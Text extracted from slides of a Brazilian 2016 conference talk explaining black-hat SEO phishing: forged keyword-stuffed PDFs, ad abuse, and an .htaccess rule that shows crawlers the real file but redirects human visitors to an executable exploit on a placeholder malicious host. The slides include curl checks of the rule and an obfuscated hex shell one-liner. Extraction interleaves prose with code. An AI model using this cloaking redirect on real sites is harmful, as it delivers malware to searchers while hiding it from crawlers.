Phishing atravs de tticas

<h1>BL4CK H4T SEO</h1>

<p>O Novo Arsenal Phisher</p>
Campus Party Brasil 2016

0x27null@phishing:~$ php wh0am1.php

[ + ] Nome:
Cleiton Pinheiro
[ + ] E-mail:
0x27null@gmail.com
[ + ] Twitter:
@0x27null
[ + ] Blog:
http://blog.0x27null.com
[ + ] GIT:
https://github.com/googleinurl
[ + ] Especialidade:
GED - Gambiarras Exploits Dorking
-------------------------------------------------------------------------------------------3ntus14st4 3m $3gur4n4 d4 1nf0rm40, Cr14d0r d0 grup0
INURL BRASIL, D3s3nv0lv3d0r PHP / C#.
47u4lm3n73 7r4b4lh4 n4 3mpr3$4 El Pescador d0 grup0 Tempest.
-------------------------------------------------------------------------------------------Campus Party Brasil 2016

Forjando documento PDF

Campus Party Brasil 2016

Forjando documento PDF

<h2>D0CUM3NT0 PDF</h2>

OCR
Optical Character Recognition

Campus Party Brasil 2016

Forjando documento PDF

Campus Party Brasil 2016

Forjando documento PDF

Campus Party Brasil 2016

Forjando documento PDF

Campus Party Brasil 2016

Forjando documento PDF

<h2>F0RG3D PDF</h2>
<h3>ESTRUTURA - PDF OUTPUT</h3>
O intuito do criminoso ter em seus arquivos
forjados o mximo possvel de palavras
chaves vinculadas ao pblico alvo.
1.
2.
3.
4.
5.
6.

{imagem}
{ttulo randmico} - {data atual}
{palavras chaves randmicas}
{palavras chaves hashtag randmicas}
{texto complementar}
{palavras chaves formato links}

Campus Party Brasil 2016

O lado do phisher

<h2>S3RVER S1DE</h2>
.htaccess MOD1FICADO
Para hackear de forma ARQU1VO
<ifmodule mod_rewrite.c>
expressiva e tambm
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} !(Googlebot|bingbot|Yahoo)
garante o acesso das
RewriteRule (.+\.pdf)$ http://www.sitemalicioso2.uk/exploit-pdf.scr [R=301,L]
vtimas a suas (URLS || </ifmodule>
arquivos maliciosos), O # TE5TE R3QUEST:
criminoso pode refinar o 0x27null@phishing:~$ curl localhost/teste/Carro.pdf -v | grep '301'
# RETURN HTTP HEADER:
arquivo .htaccess de
< HTTP/1.1 301 Moved Permanently
forma que o Bot de
< Server: Apache/2.4.12 (Ubuntu)
indexao (Web crawler) < Location: http://www.sitemalicioso2.uk/exploit-pdf.scr
tenha acesso ao seu
# TE5TE R3QUEST / SE7 USER-AGENT BOT:
0x27null@phishing:~$ curl -I localhos/tteste/Carro.pdf -v --user-agent \
contedo, mas no o
'XX/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)' -v | grep --color \
usurio alvo pois o
'pdf'
# RETURN HTTP HEADER:
mesmo direcionado
< HTTP/1.1 200 OK
para site de terceiros.
< Server: Apache/2.4.12 (Ubuntu)
< Content-Type: application/pdf)

Campus Party Brasil 2016

Relao de confiana

<h2>600gl3 AdWord5</h2>

Alcance potencial
dirio

1K
57K
cliques

impresses

Campus Party Brasil 2016

Anncio

Relao de confiana

<h2>BUSC4 1NF3CTAD4</h2>
R3SULTADO ORGNICO

R3SULTADO PATROCINADO

uma explorao de relao de confiana entre usurio e seu aplicativo web favorita, pois ele no vai oferecer o contedo carros usados,
para algum que de suma maioria curtir paginas(facebook) ou pesquisa keywords para cinema ou faz pesquisa de Corte e Costura.

Campus Party Brasil 2016

Infogrfico

Campus Party Brasil 2016

<h2>R3FERNC1A5</h2>

http://dompdf.github.com

https://www.elpescador.com.br/blog/index.php/phishing-engenharia-social-entenda-porque-essas-tecnica

https://support.google.com/drive/answer/176692?hl=pt-BR

https://scholar.google.com.br/intl/pt-BR/scholar/publishers.html#tech2

https://www.elpescador.com.br/blog/index.php/quatro-fatos-que-explicam-porque-o-phishing-e-a-maior-arma-do-cibercrime

https://support.google.com/webmasters/answer/6001181?hl=pt-br

http://httpd.apache.org/docs/2.2/pt-br/howto/htaccess.html

https://www.rapid7.com/db/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe

https://www.offensive-security.com/metasploit-unleashed/client-side-exploits

https://www.offensive-security.com/metasploit-unleashed/msfconsole

https://www.elpescador.com.br/blog/index.php/games-online-um-campo-minado-de-phishing

https://www.facebook.com/business/products/ads

https://support.google.com/webmasters/answer/1061943?hl=pt-BR

https://blog.malwarebytes.org/mobile-2/2013/12/android-pop-ups-warn-of-infection

https://www.microsoft.com/en-us/security/pc-security/antivirus-rogue.aspx

https://www.elpescador.com.br/blog/index.php/phishing-engenharia-social-entenda-porque-essas-tecnicas-estao-interligadas

http://g1.globo.com/tecnologia/blog/seguranca-digital/post/golpe-com-falsa-tela-azul-da-morte-e-veiculado-em-anuncios-na-web.html

https://blog.malwarebytes.org/fraud-scam/2015/09/malvertising-via-google-adwords-leads-to-fake-bsod

http://www.agenciamestre.com/seo/link-farm

http://help.adobe.com/livedocs/acrobat_sdk/10/Acrobat10_HTMLHelp/wwhelp/wwhimpl/common/html/wwhelp.htm?context=Acrobat10_SDK_HTMLHelp&file=JS_Dev_Overview.71.1.html

http://partners.adobe.com/public/developer/en/acrobat/sdk/AcroJSGuide.pdf

https://dl.packetstormsecurity.net/1411-exploits/googledoubleclick-redirect.txt

https://support.google.com/analytics/answer/1033981

Campus Party Brasil 2016

<marquee>OBR1GAd0</marquee>
0x27null@phishing:~$ php c0n7a7o.php
[ + ] Nome:
Cleiton Pinheiro
[ + ] E-mail:
0x27null@gmail.com
[ + ] Twitter:
@0x27null
[ + ] Blog:
http://blog.0x27null.com
[ + ] GIT:
https://github.com/googleinurl
[ + ] Especialidade:
GED - Gambiarras Exploits Dorking
------------------------------------------------------------------------------------------0x27null@phishing:~$ POF=$(Z=`echo '6964' | xxd -r -p`;$Z;Y=`echo
'637572696F73697479206B696C6C65642074686520636174' | xxd -r -p`;echo $Y;W=`echo
'202045723420756d342076337a20756d20703435356172302078346d61646f20636f72756a342e2e20456c3320666f31207630617
2206e6f203376656e746f2063346d7075732070347274792e2e206520636169752064652063617234206e302058346f2e202d2d2
0462049204d' | xxd -r -p`;echo $W);echo $POF;

Campus Party Brasil 2016